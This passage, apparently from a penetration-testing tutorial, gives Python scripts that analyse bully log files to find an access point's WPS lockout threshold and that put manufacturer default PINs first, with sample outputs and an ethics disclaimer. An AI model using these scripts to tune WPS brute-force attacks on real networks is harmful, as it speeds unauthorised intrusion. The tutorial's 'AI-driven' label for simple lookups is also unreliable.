    print(f"Most frequent attempt count (mode): {df['AttemptsBeforeLockout'].mode()[0]}")
    print(f"Total lockouts detected: {len(df)}")
    return df


if __name__ == "__main__":
    # Log file path as first argument; defaults to bully_full.log, the file
    # written by the tee example earlier on this page.
    analyze_bully_log(sys.argv[1] if len(sys.argv) > 1 else "bully_full.log")

# --- Command to run this script ---
# python3 analyze_script.py bully_full.log
Command Breakdown:
The Python script reads a log file line-by-line.
It uses regular expressions to identify lines corresponding to PIN attempts and lockout warnings.
It counts the attempts between each lockout event and stores them in a list.
Finally, it uses the Pandas library to create a DataFrame for easy statistical analysis (mean, mode).
Ethical Context & Use-Case: This script automates the manual task of log review. Instead of guessing an AP's lockout threshold, this AI-augmented approach provides empirical data. A penetration tester can use this intelligence to configure bully's timing and delay parameters (-l, -1, -2) with surgical precision, creating a highly customized and effective attack profile for the specific target device.
--> Expected Output:
--- Lockout Analysis ---
   AttemptsBeforeLockout
0                     10
1                     11
2                     10
3                     10
4                      9

--- Statistics ---
Average attempts before lockout: 10.00
Most frequent attempt count (mode): 10
Total lockouts detected: 5
Objective: 2. Generate a Prioritized PIN List based on Manufacturer Data
Create a Python script that generates a PIN list which prioritizes known default PINs for specific manufacturers (identified by the first 3 bytes of the BSSID, the OUI). This list can then be used with a modified version of bully or a wrapper script.
Python
#
# Objective: Generate a manufacturer-prioritized PIN list.
#
import sys

# This is a mock database. In a real scenario, this would be populated with actual known default PINs.
MANUFACTURER_PINS = {
    "00:1A:2B": ["12345670", "00000000"],  # Example: Linksys
    "C8:D3:A3": ["87654321", "11112222"],  # Example: TP-Link
    "00:0B:86": ["55554446"],              # Example: Netgear
}


def generate_pin_list(target_bssid):
    """
    Generates a pin list with manufacturer-specific pins first.
    Returns the prioritized list (empty if the OUI is unknown).
    """
    oui = target_bssid[:8].upper()   # first three octets of the BSSID
    prioritized_pins = MANUFACTURER_PINS.get(oui, [])
    print(f"--- AI-Generated PIN Strategy for {target_bssid} (OUI: {oui}) ---")
    if prioritized_pins:
        print("Prioritizing known default PINs for this manufacturer:")
        for pin in prioritized_pins:
            print(pin)
    else:
        print("No known default PINs for this manufacturer. Defaulting to standard attack.")
    # In a real tool, this would generate a full pin file with these at the top.
    # For this example, we just display the strategy.
    return prioritized_pins


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: python3 pin_generator.py <BSSID>")
    generate_pin_list(sys.argv[1])

# --- Command to run this script ---
# python3 pin_generator.py "00:1A:2B:3C:4D:5E"
Command Breakdown:
The script contains a dictionary (MANUFACTURER_PINS) mapping OUI prefixes to lists of known default or common PINs.
It takes a target BSSID as input.
It extracts the OUI from the BSSID and checks if it exists in the database.
It then prints a "strategy," showing the PINs that should be tried first.
Ethical Context & Use-Case: This represents a move from brute-force to intelligent-force. Instead of trying all 11,000 PIN combinations randomly, this AI-driven approach uses external data (OUI databases) to attack the most probable targets first. This can reduce the time-to-compromise from hours to seconds, demonstrating a much more severe and realistic threat scenario to the client.
--> Expected Output:
--- AI-Generated PIN Strategy for 00:1A:2B:3C:4D:5E (OUI: 00:1A:2B) ---
Prioritizing known default PINs for this manufacturer:
12345670
00000000
The information presented in this article is for educational purposes only and is intended for use in legally authorized and ethical contexts. The tools and techniques described are designed for cybersecurity professionals and enthusiasts to test and assess the security of networks and systems they either own or have explicit, written permission to audit.
Any unauthorized use of these tools against networks or systems for which you do not have permission is illegal and strictly prohibited. Such actions may lead to civil and criminal penalties. The author, course creator, and hosting platform bear no responsibility or liability for any individual's misuse or illegal application of the information provided herein. By proceeding with this material, you acknowledge your responsibility to adhere to all applicable laws and to act in a strictly ethical and professional manner.